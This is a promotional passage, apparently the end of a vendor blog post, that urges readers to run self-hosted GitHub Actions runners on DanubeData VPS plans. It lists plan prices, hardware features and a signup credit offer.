The fastest path to cutting your GitHub Actions bill in half:
- Create a DD Small VPS on DanubeData (€12.49/mo, €50 signup credit = 4 months free)
- Follow Option 1 above — it's ~20 minutes of work, end to end
- Point your most expensive CI workflow at runs-on: [self-hosted, linux, danubedata]
- Watch your monthly GitHub bill drop from three digits to zero
Why DanubeData for self-hosted runners:
- AMD EPYC dedicated vCPUs — faster compile times than GitHub's shared runners
- Dedicated NVMe storage — cache-friendly I/O, no noisy neighbors
- 20 TB of traffic per VPS — pull all the Docker images you want
- German data center — GDPR-aligned, EU-sovereign
- Flat €12.49/mo for DD Small, €24.99 for DD Medium, €49.99 for DD Large — no per-minute billing, ever
- IPv4 + IPv6, KVM virtualization, snapshots built in
Ready to reclaim your CI budget? Spin up your runner VPS now and claim the €50 signup credit.
Have a heavy CI workload and want architecture advice on ephemeral runners, ARC, or caching strategies? Reach out to our team — we've helped teams migrate from $2,000/month GitHub Actions bills to €50/month DanubeData deployments.